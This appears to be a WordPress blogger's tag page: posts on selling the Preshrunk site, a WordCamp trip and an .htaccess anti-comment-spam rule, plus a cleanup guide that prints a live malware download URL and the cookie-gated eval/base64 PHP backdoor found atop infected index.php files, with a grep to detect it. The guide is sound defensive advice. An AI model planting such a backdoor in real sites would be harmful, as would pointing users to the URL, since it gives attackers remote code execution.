Jason Cosper

Semper fudge.

Tag: Weblogging Page 1 of 3

Blog Days Are Over

Earlier this morning I confirmed the domain transfers for something that I spent almost six years of my life on. A site that I both obsessed over and neglected terribly.

As of 8 AM, Preshrunk is somebody else’s baby. Saying that is a real punch in the (emotional) dick, but at least I know it’s in good hands now.

I’m not going to use this post to talk about why I sold the site. That’s already been covered in enough detail. All I really want to say is that I’m happy it went to a good home.

Oh, I’m also happy that I can pay off a respectable chunk of our wedding loan — but that’s only because the interest rate is embarrassingly high.

Hopefully I’ll have a little more time to post here now. Considering my track record tho, I wouldn’t hold my breath for that…

Goodbye Horses

So I’ve been helping a few folks out with a Trojan that has been cropping up in a handful of WordPress installs as of late. Currently, it has been getting noticed by the good little girls and boys on Windows with virus scanners installed.  When visiting an infected site, most folks are being prompted to download: 

http://gvatemal.biz/pfd/spl/pdf.pdf

Don’t go there tho! The virus scanners identify the contents of that URL as JS:Packed-L, a packed JavaScript exploit.

So how do you find out if your install has been hit?  Well, the ones I’ve been cleaning up all have the following bit of code right at the top of their main index.php

<?php if(md5($_COOKIE['0bdcf3981272c15a'])=="23c8932280dcafe25c20c6d25c9c8660"){ eval(base64_decode($_POST['file'])); exit; } ?>

If you see that floating around, get rid of it!  Once you’ve done that, clear out your site’s cache — if you’re using a caching plugin, that is — and you should be good to go.

Should you not find that bit of code hanging around in your install’s index.php and there are people still complaining about it, I suggest getting shell access — so long as your web host is awesome and gives you that — and doing a recursive grep. At DreamHost, this is as easy as logging in and running:

grep -R 0bdcf3981272c15a /home/user/example.com/*

Of course you’ll want to replace “user” with your username and “example.com” with the domain — or folder if you broke from standard naming conventions — where WordPress is installed.  Give that command a few minutes to run and you should get a path of where that code snippet can be found.  All you have to do at that point is purge it and clear any cache you might have on your WP install.

Of course, if you managed to get hit with this, it was because there was a hole in your WordPress install. Making sure your core install and plugins are up to date is always a great idea. I check mine daily — but even doing it once a week is better than most folks.

All I’m saying is that you have to stay militant. Doing so will seriously prevent the headaches of having to deal with fixing this crap on a regular basis.

In Transit

Heads up, SF peeps! This weekend I’ll be driving up to the Yay Area for WordCamp to rep both DreamHost and Preshrunk in an official capacity.

As it stands, I’m driving up Friday night and crashing out at Frazier’s secret headquarters somewhere in the East Bay. Since I don’t like being part of the problem — or paying for parking — I’ll be taking as much public transit as I possibly can. So it’s handy that I managed to stumble upon these handy iPhone related Muni apps that use NextBus information. Now all I need is a native looking (i.e. pretty) trip planner and I’m all set. So… Does anybody know of one off the top of their heads — or am I stuck using 511.org over EDGE?

Productivity

Damn. I’ve been a busy bee tonight…

Sadly, I can’t remember the last time I pulled off that much stuff in an evening. All I know is that it feels good to be productive for a change. Perhaps I can manage to keep it up.

Attack Of The Comment Spam

Something that’s been really grinding my gears lately is the amount of comment spam that I’ve been seeing in my moderation queue. Despite the fact that I use the very wonderful Akismet for WordPress, sometimes it can’t keep up with the flood coming down the proverbial tubes.

Something’s that’s really helped is a little bit of .htaccess magic that one of my coworkers sent me. What it does is keep people from hitting your wp-comments-post.php unless they’re submitting the request from your server. Of course headers can be forged, but it’s really proven to be quite useful to me. Because of this, I thought I’d be a nice guy share it with y’all. Peep this…

RewriteEngine On
RewriteCond %{REQUEST_METHOD} POST
RewriteCond %{REQUEST_URI} .wp-comments-post\.php*
RewriteCond %{HTTP_REFERER} !.*yourdomain.com.* [OR]
RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule (.*) ^http://%{REMOTE_ADDR}/$ [R=301,L]

Naturally, you’re going to want to replace “yourdomain.com” with your actual domain — but other than that, it’s ready to go. Since I spend a lot of my day helping folks troubleshoot their WordPress installs and .htaccess rules, I’d really dig it if you’d refrain from asking questions. That’s right, this spot of code is supplied “as is”, kids.

Enjoy!

Page 1 of 3

Powered by WordPress & Theme by Anders Norén